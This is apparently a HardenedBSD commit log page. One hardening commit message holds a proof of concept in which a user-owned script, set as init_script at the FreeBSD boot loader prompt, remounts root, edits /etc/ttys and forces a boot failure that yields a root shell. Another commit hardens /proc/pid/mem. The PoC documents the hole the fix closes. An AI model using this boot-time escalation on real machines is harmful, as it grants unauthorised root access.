1. 01 May, 2015 1 commit
  2. 18 Mar, 2015 1 commit
  3. 22 Jan, 2015 1 commit
  4. 14 Jan, 2015 1 commit
  5. 26 Dec, 2014 2 commits
    • Oliver Pinter's avatar
      e880354e
    • Oliver Pinter's avatar
      HBSD: rework and extend init/boot hardening · 05cbea60
      Oliver Pinter authored
       |
         ______               ____   _____ _____
        |  ____|             |  _ \ / ____|  __ \
        | |___ _ __ ___  ___ | |_) | (___ | |  | |
        |  ___| '__/ _ \/ _ \|  _ < \___ \| |  | |
        | |   | | |  __/  __/| |_) |____) | |__| |
        | |   | | |    |    ||     |      |      |
        |_|   |_|  \___|\___||____/|_____/|_____/    ```                        `
                                                    s` `.....---.......--.```   -/
        +------------Welcome to FreeBSD-----------+ +o   .--`         /y:`      +.
        |                                         |  yo`:.            :o      `+-
        |  1. Boot Multi User [Enter]             |   y/               -/`   -o/
        |  2. Boot [S]ingle User                  |  .-                  ::/sy+:.
        |  3. [Esc]ape to loader prompt           |  /                     `--  /
        |  4. Reboot                              | `:                          :`
        |                                         | `:                          :`
        |  Options:                               |  /                          /
        |  5. [K]ernel: kernel (1 of 2)           |  .-                        -.
        |  6. Configure Boot [O]ptions...         |   --                      -.
        |                                         |    `:`                  `:`
        |                                         |      .--             `--.
        |                                         |         .---.....----.
        +-----------------------------------------+
      
        -
       To get back to the menu, type `menu' and press ENTER
       or type `boot' and press ENTER to start FreeBSD.
      
       Type '?' for a list of commands, 'help' for more detailed help.
       OK set init_script="/usr/home/op/exploit.sh"
       OK boot
       /boot/kernel/kernel text=0x1010a40 data=0x12ca20+0x3d4b70
       syms=[0x8+0x147918+0x8+0x163171]
       Booting...
       GDB: no debug ports present
       KDB: debugger backends: ddb
       KDB: current backend: ddb
       Copyright (c) 1992-2014 The FreeBSD Project.
      
      [...]
      
       Root mount waiting for: usbus2
       uhub4: 7 ports with 7 removable, self powered
       Trying to mount root from ufs:/dev/da0p2 [rw]...
      
      [...]
      
       /usr/home/op/exploit.sh: /fail: not found
       Enter full pathname of shell or RETURN for /bin/sh:
       # id
       uid=0(root) gid=0(wheel) groups=0(wheel)
       #
      
      PoC:
      
       op@opn ~> pwd
       /usr/home/op
       op@opn ~> ll exploit.sh
       -rw-r--r--  1 op  op  225 Dec 26 01:53 exploit.sh
       op@opn ~> cat exploit.sh
       #!/bin/sh
      
       /sbin/mount -u -w /
       /usr/bin/touch /exploited
       /usr/bin/sed -i '' -e  '/^console/s/\(.*\)insecure\(.*\)/\1secure\2/g' /etc/ttys
       /sbin/mount -u -r /
       # force fail in boot process to get root terminal on console
       /fail
       op@opn ~>
      
      github-issue: #28
      
      Signed-off-by: default avatarOliver Pinter <oliver.pinter@hardenedbsd.org>
      05cbea60
  6. 24 Dec, 2014 1 commit
  7. 29 Nov, 2014 1 commit
  8. 28 Nov, 2014 3 commits
  9. 23 Nov, 2014 1 commit
  10. 29 Oct, 2014 1 commit
  11. 26 Oct, 2014 1 commit
  12. 22 Oct, 2014 1 commit
  13. 21 Oct, 2014 1 commit
  14. 11 Oct, 2014 1 commit
  15. 09 Oct, 2014 2 commits
  16. 08 Oct, 2014 1 commit
    • Shawn Webb's avatar
      Harden /proc/pid/mem · 43995581
      Shawn Webb authored
      github-issue: #48
      
      Introduce a new sysctl, hardening.procfs_harden, which, when enabled,
      disables writing to /proc/pid/mem. Note that it is still possible to
      open /proc/pid/mem with the write bit to keep some sense of
      compatibility with third-party applications. Calls to write() will
      fail with permission denied.
      43995581
  17. 28 Sep, 2014 3 commits
  18. 24 Sep, 2014 1 commit
  19. 07 Sep, 2014 5 commits
  20. 23 Aug, 2014 2 commits